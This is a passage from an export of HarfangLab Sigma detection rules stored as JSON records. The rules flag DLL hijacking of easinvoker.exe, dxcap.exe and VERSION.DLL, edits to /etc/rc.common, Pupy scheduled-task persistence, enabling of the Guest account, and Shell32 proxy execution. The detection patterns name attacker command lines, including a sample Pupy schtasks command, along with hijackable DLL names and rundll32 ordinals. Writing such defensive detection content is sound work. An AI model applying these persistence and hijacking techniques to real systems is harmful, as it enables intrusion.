"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_easinvoker.yml",
"content": "title: DLL Hijacking via easinvoker.exe\nid: 0baf276d-d629-4eb2-948c-1b0f87b13160\ndescription: |\n Detects potential Windows DLL Hijacking via easinvoker.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'easinvoker.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\AUTHZ.dll'\n - '\\netutils.dll'\n - '\\samcli.dll'\n - '\\SAMLIB.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "0baf276d-d629-4eb2-948c-1b0f87b13160",
"rule_name": "DLL Hijacking via easinvoker.exe",
"rule_description": "Detects potential Windows DLL Hijacking via easinvoker.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\nLoads of the targeted DLLs from System32, SysWOW64 or WinSxS, or of libraries signed by Microsoft Windows, are filtered out, so an alert means an unsigned or non-Microsoft library was loaded by a relocated copy of the binary.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "0bc4d271-7029-4c83-bad4-a9ea34b7213b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.612097Z",
"creation_date": "2026-03-23T11:45:34.612101Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.612108Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md#atomic-test-2---rccommon",
"https://attack.mitre.org/techniques/T1037/004/"
],
"name": "t1037_004_rc_common_modified_linux.yml",
"content": "title: RC Script /etc/rc.common Modified\nid: 0bc4d271-7029-4c83-bad4-a9ea34b7213b\ndescription: |\n Detects an attempt to modify the RC script /etc/rc.common.\n The /etc/rc.common file is a script that is used to perform system-level tasks during the boot process on Unix-like systems.\n Adversaries can establish persistence by adding a malicious binary path or shell commands to this file.\n It is recommended to investigate the process that modified the `rc.common` file for suspicious activities and to review the file's new contents for injected commands or binary paths; read-only accesses are excluded by this rule.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md#atomic-test-2---rccommon\n - https://attack.mitre.org/techniques/T1037/004/\ndate: 2022/12/26\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1037.004\n - classification.Linux.Source.Filesystem\n - classification.Linux.Behavior.PrivilegeEscalation\n - classification.Linux.Behavior.Persistence\n - classification.Linux.Behavior.SystemModification\nlogsource:\n category: filesystem_event\n product: linux\ndetection:\n selection:\n - Path: '/etc/rc.common'\n - TargetPath: '/etc/rc.common'\n\n filter_read_access:\n Kind: 'access'\n Permissions: 'read'\n\n exclusion_docker:\n ProcessImage: '/usr/bin/dockerd'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "0bc4d271-7029-4c83-bad4-a9ea34b7213b",
"rule_name": "RC Script /etc/rc.common Modified",
"rule_description": "Detects an attempt to modify the RC script /etc/rc.common.\nThe /etc/rc.common file is a script that is used to perform system-level tasks during the boot process on Unix-like systems.\nAdversaries can establish persistence by adding a malicious binary path or shell commands to this file.\nIt is recommended to investigate the process that modified the `rc.common` file for suspicious activities and to review the file's new contents for injected commands or binary paths; read-only accesses are excluded by this rule.\n",
"rule_creation_date": "2022-12-26",
"rule_modified_date": "2025-04-14",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1037.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "0c371a93-177d-4ced-82ad-dc148a365686",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.083926Z",
"creation_date": "2026-03-23T11:45:34.083928Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.083932Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/n1nj4sec/pupy",
"https://attack.mitre.org/techniques/T1053/005/"
],
"name": "t1053_005_pupy_scheduled_task.yml",
"content": "title: Pupy Scheduled Task Persistence Added\nid: 0c371a93-177d-4ced-82ad-dc148a365686\ndescription: |\n Detects a suspicious scheduled task creation that is related to Pupy Attack Framework.\n Pupy is a cross-platform, multi function RAT and post-exploitation tool mainly written in Python.\n It is recommended to download and investigate the 'elevator.xml' file.\n It is also recommended to investigate the parent process for suspicious activities.\nreferences:\n - https://github.com/n1nj4sec/pupy\n - https://attack.mitre.org/techniques/T1053/005/\ndate: 2021/02/08\nmodified: 2025/08/14\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1053.005\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Framework.Pupy\n - classification.Windows.Behavior.Persistence\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n Image|endswith: '\\schtasks.exe'\n # \"C:\\Windows\\System32\\schtasks.exe\" /create /xml c:\\users\\user\\appdata\\local\\temp\\elevator.xml /tn elevator\n CommandLine|contains|all:\n - '/create '\n - '/xml '\n - '/tn elevator'\n - '\\AppData\\Local\\Temp\\elevator.xml'\n\n condition: selection\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "0c371a93-177d-4ced-82ad-dc148a365686",
"rule_name": "Pupy Scheduled Task Persistence Added",
"rule_description": "Detects a suspicious scheduled task creation associated with the Pupy attack framework: schtasks.exe invoked with /create and /xml, a task named 'elevator', and a task definition file named elevator.xml located under the user's local Temp folder.\nPupy is a cross-platform, multi-function RAT and post-exploitation tool mainly written in Python.\nIt is recommended to retrieve and investigate the 'elevator.xml' task definition file, as it describes what the scheduled task will run.\nIt is also recommended to investigate the parent process for suspicious activities.\n",
"rule_creation_date": "2021-02-08",
"rule_modified_date": "2025-08-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1053.005"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "0c391c25-0ca4-4a33-a98e-d0de4cc1eee6",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.084746Z",
"creation_date": "2026-03-23T11:45:34.084748Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.084752Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://twitter.com/RedDrip7/status/1545245625662418945",
"https://unit42.paloaltonetworks.com/brute-ratel-c4-tool/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_version.yml",
"content": "title: DLL Hijacking of VERSION.DLL\nid: 0c391c25-0ca4-4a33-a98e-d0de4cc1eee6\ndescription: |\n Detects a potential Windows DLL search order hijacking of VERSION.DLL.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n By putting a malicious DLL with the same name in the same folder, attackers can execute arbitrary code.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://twitter.com/RedDrip7/status/1545245625662418945\n - https://unit42.paloaltonetworks.com/brute-ratel-c4-tool/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/07/15\nmodified: 2025/10/21\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ImageLoaded|endswith: '\\version.dll'\n\n filter_signature_imageloaded:\n Signed: 'true'\n Signature:\n - 'Microsoft Windows'\n - 'Microsoft Corporation'\n\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n\n exclusion_programfiles:\n ProcessImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n ImageLoaded|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n exclusion_windows_sandbox:\n ImageLoaded|startswith: '\\Device\\vmsmb\\VSMB-'\n Imphash: '00000000000000000000000000000000' # mean we didn't get any info about the DLL\n\n exclusion_legitimate_dll:\n # old pascal/delphi \"version.dll\", not the MS ones (and upx packed..)\n sha256:\n - 
'31144e8b156fe87317073c48a09abcb033fda8dbdd96986c4abea8c00c00355f'\n - '3eba921ef649b71f98d9378dee8105b38d2464c9ccde37a694e4a0cd77d22a75'\n - '645ca9e88da21c63710a04a0f54421018df415a3d612112c71a255c49325c082'\n - 'd7ce1a67db5dee613760775ad4639ddb9ed2dd07f169996c78133820337d1aa3' # C:\\Program Files (x86)\\Microsoft Office\\root\\Office16\\VERSION.dll\n - 'a9a39c8c61d5cdcb9ea67e7ee5916d7f60dfe40b31474381cbdf0102f698fbb4' # Balatro\\version.dll\n\n exclusion_veeam:\n ProcessCommandLine:\n - '?:\\Windows\\system32\\rundll32.exe aepdu.dll,AePduRunUpdate'\n - '?:\\Program Files (x86)\\Symantec\\Symantec Endpoint Protection\\\\*\\Bin\\ccSvcHst.exe'\n # SHA-256: 3d520df7824e332886a1307d3153e0fb5c2b85ac67a1e194ee3adb1bfbaecf8a\n # SHA-256: ccd18aa682718cd765840c249c10c9be4d41affd8fc7a590d5f25619a22814f5\n ImageLoaded: '?:\\Program Files (x86)\\Veeam\\Backup Transport\\GuestInteraction\\VSS\\VeeamGuestHelpers\\WinCoreCompatLayer\\version.dll'\n\n exclusion_signed:\n Signature:\n # ImageLoaded: 'C:\\Program Files\\QlikView\\Server\\QlikViewClients\\QlikViewAjax\\bin\\Version.dll'\n - 'QlikTech International AB'\n - 'ASUSTeK Computer Inc.'\n - 'IObit CO., LTD'\n - 'Veeam Software Group GmbH'\n\n exclusion_imageloaded:\n ImageLoaded:\n - '?:\\$WINDOWS.~BT\\NewOS\\Windows\\System32\\version.dll'\n - '?:\\$WINDOWS.~BT\\NewOS\\Windows\\WinSxS\\amd64_microsoft-windows-version_*\\version.dll'\n - '?:\\ProgramData\\docker\\windowsfilter\\\\*\\Files\\Windows\\System32\\forwarders\\version.dll'\n\n exclusion_app:\n ProcessImage|contains:\n - '\\App\\GlaryUtilities\\'\n - '\\App\\SketchUp 20??\\'\n - '\\App\\TreeSize\\TreeSize.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Glarysoft Ltd'\n - 'Trimble Inc.'\n - 'JAM Software GmbH'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "0c391c25-0ca4-4a33-a98e-d0de4cc1eee6",
"rule_name": "DLL Hijacking of VERSION.DLL",
"rule_description": "Detects a potential Windows DLL search order hijacking of VERSION.DLL.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nBy putting a malicious DLL with the same name in the same folder, attackers can execute arbitrary code.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-07-15",
"rule_modified_date": "2025-10-21",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "0c620fa1-5877-425b-b91e-920d723b4eab",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.591725Z",
"creation_date": "2026-03-23T11:45:34.591728Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.591736Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_dxcap.yml",
"content": "title: DLL Hijacking via dxcap.exe\nid: 0c620fa1-5877-425b-b91e-920d723b4eab\ndescription: |\n Detects potential Windows DLL Hijacking via dxcap.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'dxcap.exe'\n ImageLoaded|endswith:\n - '\\d3d11.dll'\n - '\\dbghelp.dll'\n - '\\xmllite.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "0c620fa1-5877-425b-b91e-920d723b4eab",
"rule_name": "DLL Hijacking via dxcap.exe",
"rule_description": "Detects potential Windows DLL Hijacking via dxcap.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "0c76fbf6-2adc-4728-bf4c-92b0f9d5c847",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.088943Z",
"creation_date": "2026-03-23T11:45:34.088945Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.088949Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://learn.microsoft.com/en-us/windows/security/identity-protection/access-control/local-accounts#guest",
"https://attack.mitre.org/techniques/T1078/001/"
],
"name": "t1078_001_guest_account_enabled.yml",
"content": "title: Guest Account Enabled\nid: 0c76fbf6-2adc-4728-bf4c-92b0f9d5c847\ndescription: |\n Detects the activation of the built-in Guest account, via Security event 4722 (a user account was enabled) targeting a SID ending in the well-known RID 501, so the account is matched even if it has been renamed.\n This account is disabled by default and can be enabled by attackers to maintain access to a victim system as a persistence mechanism.\n It is recommended to identify the account and process that performed the change to determine its legitimacy, to investigate any subsequent authentications using the Guest account, and to disable the account again if the change is not authorized.\nreferences:\n - https://learn.microsoft.com/en-us/windows/security/identity-protection/access-control/local-accounts#guest\n - https://attack.mitre.org/techniques/T1078/001/\ndate: 2024/01/04\nmodified: 2025/02/04\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.initial_access\n - attack.t1078.001\n - classification.Windows.Source.EventLog\n - classification.Windows.Behavior.AccountManipulation\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n service: security\ndetection:\n selection:\n Source: 'Microsoft-Windows-Security-Auditing'\n EventID: 4722\n TargetSid|endswith: '-501'\n\n condition: selection\nlevel: high\nconfidence: moderate",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "0c76fbf6-2adc-4728-bf4c-92b0f9d5c847",
"rule_name": "Guest Account Enabled",
"rule_description": "Detects the activation of the built-in Guest account, via Security event 4722 (a user account was enabled) targeting a SID ending in the well-known RID 501, so the account is matched even if it has been renamed.\nThis account is disabled by default and can be enabled by attackers to maintain access to a victim system as a persistence mechanism.\nIt is recommended to identify the account and process that performed the change to determine its legitimacy, to investigate any subsequent authentications using the Guest account, and to disable the account again if the change is not authorized.\n",
"rule_creation_date": "2024-01-04",
"rule_modified_date": "2025-02-04",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.initial_access",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1078.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "0cd0225c-b3cf-4b13-b578-75c10f83bbb5",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.086416Z",
"creation_date": "2026-03-23T11:45:34.086418Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.086422Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Libraries/Shell32/",
"https://attack.mitre.org/techniques/T1218/011/"
],
"name": "t1218_011_suspicious_shell32.yml",
"content": "title: Suspicious Proxy Execution via Shell32\nid: 0cd0225c-b3cf-4b13-b578-75c10f83bbb5\ndescription: |\n Detects the suspicious execution of the legitimate Windows DLL Shell32.dll using parameters allowing for proxy execution.\n This binary can be used as a LOLBin in order to execute binaries or load DLLs.\n It is recommended to investigate the process responsible for the execution of Shell32 as well as the executed payload to look for malicious content or actions.\nreferences:\n - https://lolbas-project.github.io/lolbas/Libraries/Shell32/\n - https://attack.mitre.org/techniques/T1218/011/\ndate: 2022/12/15\nmodified: 2025/10/03\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218.011\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Shell32\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_exec_rundll:\n - Image|endswith: '\\rundll32.exe'\n - OriginalFileName: 'rundll32.exe'\n\n selection_exec_shell32:\n CommandLine|contains|all:\n - 'shell32'\n - ','\n\n selection_exec_args:\n CommandLine|contains:\n - 'Control_RunDLL'\n - '#274' # Control_RunDLL\n - '#275' # Control_RunDLLA\n - '#276' # Control_RunDLLAsUserW\n - '#277' # Control_RunDLLW\n - 'ShellExec_RunDLL'\n - '#569' # ShellExec_RunDLL\n - '#570' # ShellExec_RunDLLA\n - '#571' # ShellExec_RunDLLW\n\n selection_suspicious_ordinal:\n CommandLine|contains:\n - '#274' # Control_RunDLL\n - '#275' # Control_RunDLLA\n - '#276' # Control_RunDLLAsUserW\n - '#277' # Control_RunDLLW\n - '#569' # ShellExec_RunDLL\n - '#570' # ShellExec_RunDLLA\n - '#571' # ShellExec_RunDLLW\n\n selection_suspicious_folder:\n CommandLine|contains:\n - '\\AppData\\'\n - '\\Temp\\'\n - '%AppData%'\n - '%LocalAppData%'\n - '%Temp%'\n - '?:\\Users\\Public'\n - '?:\\PerfLogs\\'\n\n exclusion_share:\n ParentImage|startswith: '\\\\\\\\'\n\n 
exclusion_legitimate:\n CommandLine|contains:\n - '@screensaver'\n - 'mmsys.cpl,,playback'\n - 'mmsys.cpl,,sounds'\n - 'mmsys.cpl,,recording'\n - 'mmsys.cpl,,{0.0.0.00000000}'\n - '?:\\Windows\\system32\\\\*.cpl'\n - '?:\\windows\\CCM\\\\*.cpl'\n - '\\Office??\\MLCFG32.CPL'\n - 'PowerCfg.cpl @0,/editplan:'\n - 'input.dll,,{C07337D3-DB2C-4D0B-9A93-B722A6C106E2}'\n - 'inetcpl.cpl,,0'\n - 'Control_RunDLL desk.cpl,'\n - 'sysdm.cpl,,1'\n - 'Control_RunDLL timedate.cpl'\n - 'Control_RunDLL nusrmgr.cpl'\n - 'Control_RunDLL srchadmin.dll'\n - 'Control_RunDLL ?:\\WINDOWS\\System32\\srchadmin.dll'\n - 'Control_RunDLL appwiz.cpl,'\n - 'Control_RunDLL bthprops.cpl,'\n\n exclusion_jp2launcher:\n ParentImage:\n - '?:\\Program Files\\Java\\\\*\\bin\\jp2launcher.exe'\n - '?:\\Program Files (x86)\\\\*\\bin\\jp2launcher.exe'\n\n # https://www.berger-levrault.com/fr/\n exclusion_berger-levrault:\n ParentImage: '?:\\Program Files (x86)\\BL\\BL\\bin\\e.magnus.exe'\n\n exclusion_healthcare:\n ParentImage: '?:\\Program Files\\GE Healthcare\\Centricity\\\\*.exe'\n\n exclusion_xilinx:\n ParentImage: '?:\\Xilinx\\xic\\tps\\win64\\\\*\\bin\\java.exe'\n\n condition: all of selection_exec_* and 1 of selection_suspicious_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "0cd0225c-b3cf-4b13-b578-75c10f83bbb5",
"rule_name": "Suspicious Proxy Execution via Shell32",
"rule_description": "Detects the suspicious invocation of the legitimate Windows library Shell32.dll through rundll32.exe using exported functions that allow proxy execution (Control_RunDLL and ShellExec_RunDLL, referenced by name or by ordinal), when the command line additionally references an export ordinal or a user-writable location such as AppData, Temp, Public or PerfLogs.\nThis library can be abused as a LOLBin to execute binaries or load DLLs under a trusted, Microsoft-signed host process.\nIt is recommended to investigate the process responsible for the invocation of Shell32 as well as the executed payload to look for malicious content or actions.\n",
"rule_creation_date": "2022-12-15",
"rule_modified_date": "2025-10-03",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1218.011"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "0cde446e-6eec-4d9c-a4df-ad0b836c3406",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
